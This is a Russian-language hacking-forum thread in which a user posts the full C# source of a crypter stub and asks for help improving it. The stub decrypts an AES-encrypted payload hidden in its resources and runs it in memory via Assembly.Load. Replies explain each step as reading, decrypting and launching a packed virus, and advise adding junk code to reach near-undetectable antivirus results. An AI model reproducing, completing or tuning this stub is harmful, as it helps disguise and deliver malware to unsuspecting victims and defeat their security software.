Софт Криптор на C#

[yanhuda2282]

Всем здравствуйте! Решил сделать криптор на с# :screamcat:.Так вот и я остановился на том что я нашел исходники старого криптора и переделал его просто до не узнаваемости!

Пожалуйста, авторизуйтесь для просмотра ссылки.

- нажать на гуи откроется фото :openmouth:

Вот почему я и написал возникла проблемка нужно корректировать стаб но я полный 0 в этом. НЕ могли бы вы дать пару статей за рубежом т.к там более понятные темы и по делу.

Сам код Стаба

using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;

namespace Stub
{
    static class cMain
    {
        private static byte[] bSalt = new byte[] { 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 };
        public static byte[] Decrypt(byte[] bData, byte[] bKey)
        {
            byte[] bDecrypted = null;

            using (MemoryStream mStream = new MemoryStream())
            {
                using (RijndaelManaged rmAES = new RijndaelManaged())
                {
                    rmAES.KeySize = 256;
                    rmAES.BlockSize = 128;

                    Rfc2898DeriveBytes rfcKey = new Rfc2898DeriveBytes(bKey, bSalt, 1000);

                    rmAES.Key = rfcKey.GetBytes(rmAES.KeySize / 8);
                    rmAES.IV = rfcKey.GetBytes(rmAES.BlockSize / 8);

                    rmAES.Mode = CipherMode.CBC;

                    using (CryptoStream cStream = new CryptoStream(mStream, rmAES.CreateDecryptor(), CryptoStreamMode.Write))
                    {
                        cStream.Write(bData, 0, bData.Length);
                        cStream.Close();
                    }

                    bDecrypted = mStream.ToArray();
                }
            }

            return bDecrypted;
        }

        [STAThread]
        static void Main()
        {
            Assembly aASM = Assembly.GetExecutingAssembly();

            using (Stream sResStream = aASM.GetManifestResourceStream("%RES_NAME%"))
            {
                if (sResStream == null)
                    return;

                byte[] bFile = new byte[sResStream.Length];
                sResStream.Read(bFile, 0, bFile.Length);

                bFile = Decrypt(bFile, System.Text.Encoding.Default.GetBytes("%ENC_KEY%"));

                Assembly.Load(bFile).EntryPoint.Invoke(null, null);

            }
        }
    }
}

Всем кто поможет буду мега благодарен!!!
Еще кому не сложно объяснить что в этом стабе происходит.

 

[dzh1gurd4]

Пожалуйста, авторизуйтесь для просмотра ссылки.

+

Пожалуйста, авторизуйтесь для просмотра ссылки.

Пожалуйста, авторизуйтесь для просмотра ссылки.

Пожалуйста, авторизуйтесь для просмотра ссылки.

Пожалуйста, авторизуйтесь для просмотра ссылки.

Пожалуйста, авторизуйтесь для просмотра ссылки.

Гайд - [.NET C#] Учимся создавать деобфускатор | Игровой форум YouGame.Biz

 

[Kaidoz]

using (Stream sResStream = aASM.GetManifestResourceStream("%RES_NAME%")) { if (sResStream == null) return; byte[] bFile = new byte[sResStream.Length]; sResStream.Read(bFile, 0, bFile.Length);

Чтение запакованного вируса из ресурсов.

bFile = Decrypt(bFile, System.Text.Encoding.Default.GetBytes("%ENC_KEY%"));

Дешифровка запакованного вируса

Assembly.Load(bFile).EntryPoint.Invoke(null, null);

Запуск через Assembly.Load

Данный способ работает только c .net приложениями. К тому же данный стаб с большей вероятностью у всех антивирусов будет детектиться. Нужен всякий различный мусорный код(ни раз конечно говорили, что это ничего дает, но по моим наблюдениям помогало почти до fud результата).

 

[Jacellen]

Чтение запакованного вируса из ресурсов.

Дешифровка запакованного вируса

Запуск через Assembly.Load

Данный способ работает только c .net приложениями. К тому же данный стаб с большей вероятностью у всех антивирусов будет детектиться. Нужен всякий различный мусорный код(ни раз конечно говорили, что это ничего дает, но по моим наблюдениям помогало почти до fud результата).

 

[z0rdexx]

Пожалуйста, авторизуйтесь для просмотра ссылки.

клик